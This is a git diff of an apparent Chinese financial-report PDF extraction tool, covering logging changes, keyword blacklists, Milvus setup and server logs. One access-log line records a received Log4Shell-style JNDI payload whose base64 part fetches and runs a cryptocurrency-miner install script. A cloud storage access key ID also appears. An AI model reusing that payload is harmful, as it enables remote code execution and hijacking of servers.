    text = replace_all(text, replacement_dict)
    #单独出现12月31日时，就剔除掉
-    pattern_year = r'(?<!2023年|2022年|2021年)12月31日'
+    pattern_year = r'(?<!2025年|2024年|2023年|2022年|2021年)12月31日'
    text = re.sub(pattern_year, '', text)
    pattern = r"\（[^）]*\）|\([^)]*\)"  # 增加英文括号的匹配
@ -137,11 +145,11 @@ def convert_docx_to_pdf(file_path):
        try:
            # 执行转换
            convert(file_path, pdf_path)
-            print(f"转换成功: {pdf_path}")
+            logger.info(f"转换成功: {pdf_path}")
        except Exception as e:
-            print(f"转换失败: {e}")
+            logger.error(f"转换失败: {e}")
    else:
-        print("错误: 文件必须是 .docx 格式。")
+        logger.error("错误: 文件必须是 .docx 格式。")
 def save_pdf_from_url(url, file_path):
    from urllib.parse import unquote
@ -163,10 +171,10 @@ def save_pdf_from_url(url, file_path):
        with open(local_file_path, 'wb') as file:
            file.write(response.content)
-            print(f"文件已下载到 {local_file_path}")
+            logger.info(f"文件已下载到 {local_file_path}")
    else:
        # 文件下载失败
-        print(f"无法下载文件，状态码：{response.status_code}")
+        logger.error(f"无法下载文件，状态码：{response.status_code}")
    return local_file_path
@ -252,7 +260,7 @@ def get_season_flag(text):
        return '0'
 def get_percent_flag(text):
-    percent_word = '收益率|占比|比重|比例|同比增减|同比上升|同比下降|变化幅度|同期增减|本年比上年增减|同比变动|变动比例|本年度比上年度增减|增减'
+    percent_word = '收益率|占比|比重|比例|同比增减|同比上升|同比下降|变化幅度|同期增减|本年比上年增减|同比变动|本期期末金额较上期期末变动比例'
    if len(re.findall(percent_word, text)) > 0:
        return '1'
    else:
@ -293,40 +301,7 @@ def check_black_list(meta_measure, pdf_measure, black_array):
 def check_black_list_old(meta_measure,pdf_measure):
    # 判断指标名是否包含黑名单词
-    #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
+    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用']
    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计'
                   ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
                   ,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润'
                   ,'扣非净利润:净资产,净利率,年度公司'
                   ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除'
                   ,'筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
                   ,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除'
                   ,'非经常性损益:扣除非经常性损益'
                   ,'基本每股收益:稀释每股收益,发行新股'
                   ,'稀释每股收益:基本每股收益,发行新股'
                   ,'总资产:净资产','应收账款:应付账款,年以上,内,至,到'
                   ,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
                   ,'应付账款:应收账款,年以上,内,至,到'
                   ,'长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押'
                   ,'研发投入:比例,比率,占比,费用,占'
                   ,'资本化研发投入:比例,比率,占比,费用,占'
                   ,'资本化研发投入占比:金额,费用'
                   ,'研发投入占营业收入比例:金额,费用'
                   ,'上年年末:1月1日'
                   ,'期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
                   ,'期扣非加权平均净资产收益率:同比,年化,每股'
                   ,'加权平均净资产收益率同比变动:年化,每股'
                   ,'研发费用:制造,投入,直接,管理'
                   ,'应收账款:1-2年','货币资金:在途'
                   ,'当期:2023年1-6月,调整后'
                   ,'营业成本:营业总成本'
                   ,'长期借债:年内到期','研发投入:直接'
                   ,'第一季度:第二季度,第三季度,第四季度'
                   ,'第二季度:第一季度,第三季度,第四季度'
                   ,'第三季度:第二季度,第一季度,第四季度'
                   ,'第四季度:第二季度,第三季度,第一季度'
                   ,'研发费用:研发支出,研发投入','存货:跌价准备'
                   ,'费用:日常,付现','固定资产:改良,补助,投资']
    # current_period = f'当期:{report_year}年1-6月'
    # black_array.append(current_period)
    for black in black_array:
@ -550,26 +525,26 @@ def check_black_table_list(data):
            black_meta = black.split(':')[0]
            black_pdfs = black.split(':')[1].split(',')
            if any(black_meta in cell for row in data for cell in row):
-                print(data)
+                logger.debug(data)
                for pdf in black_pdfs:
                    data = [row for row in data if not any(pdf in cell for cell in row)]
    return data
 if __name__ == '__main__':
-    print(len('我是我'))
+    logger.debug(len('我是我'))
-    # print(under_non_alpha_ratio('202水电费水电费水电费是的205月'))
+    # logger.debug(under_non_alpha_ratio('202水电费水电费水电费是的205月'))
    # title = '母公司财务报表主要项目注释'
    # if len(re.findall('母公司|现金流量表补充', title)) >0 and len(re.findall('项目注释', title)) == 0:
-    #     print('1')
+    #     logger.debug('1')
    # else:
-    #     print('0')
+    #     logger.debug('0')
-    # print(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
+    # logger.debug(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
    # test = '2023年1-12月'
-    # print(get_period_type('上年度本期费用化研发投入'))
+    # logger.debug(get_period_type('上年度本期费用化研发投入'))
-    # print(get_period_type('费用化研发投入本年度'))
+    # logger.debug(get_period_type('费用化研发投入本年度'))
    # vector_a = embed_with_str('第一季度营业收入')
    # vector = vector_a.output["embeddings"][0]["embedding"]
@ -577,7 +552,7 @@ if __name__ == '__main__':
    # vector1 = vector_b.output["embeddings"][0]["embedding"]
    # similarity = cosine_similarity(vector, vector1)
-    # print(f"余弦相似度: {similarity}")
+    # logger.debug(f"余弦相似度: {similarity}")
    # measure_data = [
    #     '1,1,营业收入2023年金额,1003535799.51',
@ -792,21 +767,14 @@ if __name__ == '__main__':
    # )
    # vector_obj = embed_with_str('2023年营业收入')
    # vector = vector_obj.output["embeddings"][0]["embedding"]
    # data = [vector]
    # res = client.search(
    #     collection_name="zzb_measure", # Replace with the actual name of your collection
    #     # Replace with your query vector
    #     data=data,
    #     limit=1, # Max. number of search results to return
    #     search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
    #     output_fields=["measure_name","measure_value"]
    # )
-    # # Convert the output to a formatted JSON string
+    # vector_b = embed_with_str('营业收入第一季度')
-    # result = json.dumps(res, indent=4, ensure_ascii=False)
+    # vector1 = vector_b.output["embeddings"][0]["embedding"]
-    # print(result)
+
    # similarity = cosine_similarity(vector, vector1)
    # logger.debug(f"余弦相似度: {similarity}")
    # insert_measure_data(client, measure_data)
    # text = '营业收入第一季度（1-3月份）'
    # new_text = re.sub(r'（[^)]*）', '',text)
-    # print(new_text)
+    # logger.debug(new_text)
--- a/zzb_data_prod/wget-log
+++ b/zzb_data_prod/wget-log
@ -0,0 +1,3 @@
 --2024-12-27 11:22:17--  https://financial-report.obs.cn-east-3.myhuaweicloud.com/upload/file/44b374ac0fe140a2922c360db47335a1.PDF?AccessKeyId=WMBIZTLULUR24OBUIRC4
 Resolving financial-report.obs.cn-east-3.myhuaweicloud.com (financial-report.obs.cn-east-3.myhuaweicloud.com)... failed: Name or service not known.
 wget: unable to resolve host address ‘financial-report.obs.cn-east-3.myhuaweicloud.com’
--- a/zzb_data_prod/word2pdf.py
+++ b/zzb_data_prod/word2pdf.py
--- a/zzb_data_word/.idea/zzb_data.iml
+++ b/zzb_data_word/.idea/zzb_data.iml
@ -0,0 +1,14 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <module type="PYTHON_MODULE" version="4">
  <component name="NewModuleRootManager">
    <content url="file://$MODULE_DIR$">
      <excludeFolder url="file://$MODULE_DIR$/venv" />
    </content>
    <orderEntry type="jdk" jdkName="Python 3.8" jdkType="Python SDK" />
    <orderEntry type="sourceFolder" forTests="false" />
  </component>
  <component name="PyDocumentationSettings">
    <option name="format" value="PLAIN" />
    <option name="myDocStringFormat" value="Plain" />
  </component>
 </module>
--- a/zzb_data_word/1.PDF
+++ b/zzb_data_word/1.PDF
--- a/zzb_data_word/1.docx
+++ b/zzb_data_word/1.docx
--- a/zzb_data_word/101.docx
+++ b/zzb_data_word/101.docx
--- a/zzb_data_word/102.docx
+++ b/zzb_data_word/102.docx
--- a/zzb_data_word/Mil_unit.py
+++ b/zzb_data_word/Mil_unit.py
@ -28,42 +28,3 @@ def create_partition_by_hour(current_hour):
            pre_partition.release()
            collection.drop_partition(name)
            print(f"Partition '{name}' deleted.")
 from pymilvus import connections, CollectionSchema, Collection,utility,FieldSchema,DataType
 # 连接到 B 服务器上的 Milvus
 # connections.connect(host='124.70.129.232', port='19530')# 测试服务器
 connections.connect(host='127.0.0.1', port='19530')# 测试服务器
 # # 获取集合列表
 utility.drop_collection("pdf_measure_v4")
 # 定义字段
 fields = [
    FieldSchema(name="id", dtype=DataType.INT64, is_primary=True, auto_id=True),
    FieldSchema(name="vector", dtype=DataType.FLOAT_VECTOR, dim=1536),
    FieldSchema(name="table_num", dtype=DataType.INT16),
    FieldSchema(name="table_index", dtype=DataType.INT16),
    FieldSchema(name="measure_name", dtype=DataType.VARCHAR, max_length=200),
    FieldSchema(name="measure_value", dtype=DataType.VARCHAR, max_length=200),
    FieldSchema(name="file_id", dtype=DataType.VARCHAR, max_length=200),
    FieldSchema(name="measure_unit", dtype=DataType.VARCHAR, max_length=200)
 ]
 # 定义集合的 schema
 schema = CollectionSchema(fields=fields, description="My Milvus collection")
 # 创建集合
 collection = Collection(name="pdf_measure_v4", schema=schema)
 collection = Collection("pdf_measure_v4")
 index_params = {
    "index_type": "IVF_FLAT",
    "metric_type": "COSINE",
    "params": {"nlist": 128}
 }
 collection.create_index(field_name="vector", index_params=index_params)
 collection.load()
--- a/zzb_data_word/app.log
+++ b/zzb_data_word/app.log
@ -0,0 +1,5 @@
 nohup: ignoring input
 INFO:     Started server process [1654611]
 INFO:     Waiting for application startup.
 INFO:     Application startup complete.
 INFO:     Uvicorn running on http://0.0.0.0:8001 (Press CTRL+C to quit)
--- a/zzb_data_word/app_word.log
+++ b/zzb_data_word/app_word.log
@ -0,0 +1,521 @@
 nohup: ignoring input
 INFO:     Started server process [2255841]
 INFO:     Waiting for application startup.
 INFO:     Application startup complete.
 INFO:     Uvicorn running on http://0.0.0.0:8001 (Press CTRL+C to quit)
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     80.66.83.46:32838 - "CONNECT 80.66.83.46%3A80 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     64.62.197.53:3545 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.197.50:35771 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.197.47:13919 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.197.48:21545 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     185.191.126.248:57546 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     1.92.159.135:33735 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     1.92.159.135:57283 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     111.7.96.172:12566 - "GET / HTTP/1.1" 404 Not Found
 INFO:     123.249.108.188:15282 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     185.191.126.248:36188 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     95.214.53.211:49760 - "GET / HTTP/1.1" 404 Not Found
 INFO:     13.58.97.162:57062 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     185.191.126.248:49978 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     39.105.14.55:35848 - "GET / HTTP/1.1" 404 Not Found
 INFO:     39.105.14.55:35238 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.156.60:32883 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.156.62:35677 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.156.63:36665 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.156.64:2695 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     154.212.141.167:39308 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     185.216.140.186:50780 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
 INFO:     206.168.34.197:34136 - "GET / HTTP/1.1" 404 Not Found
 INFO:     206.168.34.197:34148 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     123.249.108.188:18897 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     204.188.228.42:37138 - "GET / HTTP/1.1" 404 Not Found
 INFO:     87.236.176.70:45919 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     74.82.47.5:59374 - "GET / HTTP/1.1" 404 Not Found
 INFO:     74.82.47.5:36568 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     74.82.47.5:22818 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     74.82.47.5:22834 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 INFO:     185.216.140.186:39202 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     113.141.84.160:46762 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     172.206.143.215:52262 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     65.49.20.66:32032 - "GET / HTTP/1.1" 404 Not Found
 INFO:     65.49.20.66:11880 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     65.49.20.66:8166 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     65.49.20.66:8170 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 INFO:     125.36.252.182:35210 - "HEAD http%3A//110.242.68.4/ HTTP/1.1" 404 Not Found
 INFO:     183.93.85.22:45035 - "GET http%3A//www.wujieliulan.com/ HTTP/1.1" 404 Not Found
 INFO:     183.93.85.22:63911 - "CONNECT www.baidu.com%3A443 HTTP/1.1" 404 Not Found
 INFO:     183.93.85.22:56321 - "GET http%3A//www.rfa.org/english/ HTTP/1.1" 404 Not Found
 INFO:     183.93.85.22:49588 - "CONNECT cn.bing.com%3A443 HTTP/1.1" 404 Not Found
 INFO:     183.93.85.22:20626 - "GET http%3A//dongtaiwang.com/ HTTP/1.1" 404 Not Found
 INFO:     183.93.85.22:18861 - "CONNECT www.voanews.com%3A443 HTTP/1.1" 404 Not Found
 INFO:     121.29.178.42:41815 - "GET http%3A//www.epochtimes.com/ HTTP/1.1" 404 Not Found
 INFO:     121.29.178.42:58806 - "CONNECT www.so.com%3A443 HTTP/1.1" 404 Not Found
 INFO:     121.29.178.42:22055 - "GET http%3A//www.soso.com/ HTTP/1.1" 404 Not Found
 INFO:     121.29.178.42:15541 - "GET http%3A//www.minghui.org/ HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     206.168.34.36:50306 - "GET / HTTP/1.1" 404 Not Found
 INFO:     206.168.34.36:50314 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     185.191.126.248:59964 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     223.113.128.158:50058 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     185.191.126.248:35796 - "GET / HTTP/1.1" 404 Not Found
 INFO:     52.81.237.92:54862 - "GET / HTTP/1.1" 404 Not Found
 INFO:     52.81.237.92:54864 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     52.81.237.92:54884 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
 INFO:     52.81.237.92:54874 - "GET /robots.txt HTTP/1.1" 404 Not Found
 INFO:     162.243.8.38:44506 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     64.62.197.214:16647 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.197.223:22653 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.197.221:26687 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.197.214:2107 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     124.70.63.89:57249 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     124.70.63.89:18564 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     221.3.24.185:64663 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     106.75.189.197:40002 - "POST /token HTTP/1.1" 404 Not Found
 INFO:     185.191.126.248:39220 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     113.141.85.252:58036 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     103.203.58.4:47208 - "GET / HTTP/1.1" 404 Not Found
 INFO:     2.57.122.207:42128 - "GET / HTTP/1.1" 404 Not Found
 INFO:     2.57.122.207:42128 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     162.142.125.37:35894 - "GET / HTTP/1.1" 404 Not Found
 INFO:     162.142.125.37:35908 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     206.168.34.121:38726 - "GET / HTTP/1.1" 404 Not Found
 INFO:     206.168.34.121:38738 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     206.168.34.42:34776 - "GET / HTTP/1.1" 404 Not Found
 INFO:     206.168.34.42:54344 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     87.236.176.211:56241 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     64.62.156.14:6981 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.156.21:38001 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.156.17:47719 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.156.19:24409 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     31.13.224.51:36814 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     120.46.16.109:30384 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     120.46.16.109:16930 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     123.249.108.188:43694 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.191.126.248:56286 - "GET / HTTP/1.1" 404 Not Found
 INFO:     184.105.139.70:59608 - "GET / HTTP/1.1" 404 Not Found
 INFO:     184.105.139.70:54880 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     184.105.139.70:54884 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     184.105.139.70:65464 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     185.191.126.248:34390 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.216.140.186:55756 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
 INFO:     124.70.90.23:52356 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     36.41.68.61:44290 - "GET / HTTP/1.1" 404 Not Found
 INFO:     13.64.193.117:47282 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.216.140.186:59794 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
 INFO:     162.142.125.33:47956 - "GET / HTTP/1.1" 404 Not Found
 INFO:     162.142.125.33:47972 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     159.65.236.96:54972 - "GET / HTTP/1.1" 404 Not Found
 INFO:     123.145.33.216:17362 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     5.135.58.198:44397 - "GET / HTTP/1.1" 404 Not Found
 INFO:     178.32.72.218:47617 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     60.191.20.210:43456 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     184.105.247.195:24312 - "GET / HTTP/1.1" 404 Not Found
 INFO:     184.105.247.195:18346 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     184.105.247.195:18362 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     184.105.247.195:18378 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 INFO:     80.75.212.9:36590 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     185.191.126.248:33458 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     185.91.127.9:43792 - "GET /t%28%27%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%24%7Benv%3ANaN%3A-%3A%7D%24%7Benv%3ANaN%3A-l%7Ddap%24%7Benv%3ANaN%3A-%3A%7D//89.34.230.11%3A3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27%29 HTTP/1.1" 404 Not Found
 INFO:     185.91.127.43:34340 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     185.191.126.248:47662 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     1.94.195.230:27084 - "HEAD / HTTP/1.1" 404 Not Found
 INFO:     1.94.195.230:52315 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.216.140.186:37086 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
 INFO:     87.236.176.221:52211 - "GET / HTTP/1.1" 404 Not Found
 INFO:     206.168.34.206:59698 - "GET / HTTP/1.1" 404 Not Found
 INFO:     206.168.34.206:59708 - "PRI %2A HTTP/2.0" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     80.75.212.9:43956 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
 INFO:     64.62.197.80:52199 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.197.81:37671 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.197.89:8367 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.197.81:27717 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     152.32.135.214:45910 - "GET / HTTP/1.1" 404 Not Found
 INFO:     152.32.135.214:39902 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     152.32.135.214:39908 - "GET /robots.txt HTTP/1.1" 404 Not Found
 INFO:     152.32.135.214:39912 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     185.191.126.248:51164 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     120.46.16.109:25305 - "HEAD /sitemap.xml HTTP/1.1" 404 Not Found
 INFO:     120.46.16.109:57264 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 INFO:     154.212.141.151:56762 - "GET / HTTP/1.1" 404 Not Found
 INFO:     185.191.126.248:44644 - "GET / HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     64.62.197.165:56651 - "GET / HTTP/1.1" 404 Not Found
 INFO:     64.62.197.152:10483 - "GET /favicon.ico HTTP/1.1" 404 Not Found
 INFO:     64.62.197.160:50057 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
 INFO:     64.62.197.161:40701 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 WARNING:  Invalid HTTP request received.
 INFO:     138.197.191.87:39360 - "GET / HTTP/1.1" 404 Not Found
 ERROR:    Exception in ASGI application
 Traceback (most recent call last):
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/protocols/http/h11_impl.py", line 407, in run_asgi
    result = await app(  # type: ignore[func-returns-value]
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/middleware/proxy_headers.py", line 69, in __call__
    return await self.app(scope, receive, send)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/fastapi/applications.py", line 1054, in __call__
    await super().__call__(scope, receive, send)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/applications.py", line 123, in __call__
    await self.middleware_stack(scope, receive, send)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 186, in __call__
    raise exc
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 164, in __call__
    await self.app(scope, receive, _send)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/exceptions.py", line 65, in __call__
    await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/_exception_handler.py", line 78, in wrapped_app
    await response(scope, receive, sender)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/responses.py", line 152, in __call__
    await send(
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/_exception_handler.py", line 50, in sender
    await send(message)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 161, in _send
    await send(message)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/protocols/http/h11_impl.py", line 489, in send
    output = self.conn.send(event=response)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 512, in send
    data_list = self.send_with_data_passthrough(event)
  File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 537, in send_with_data_passthrough
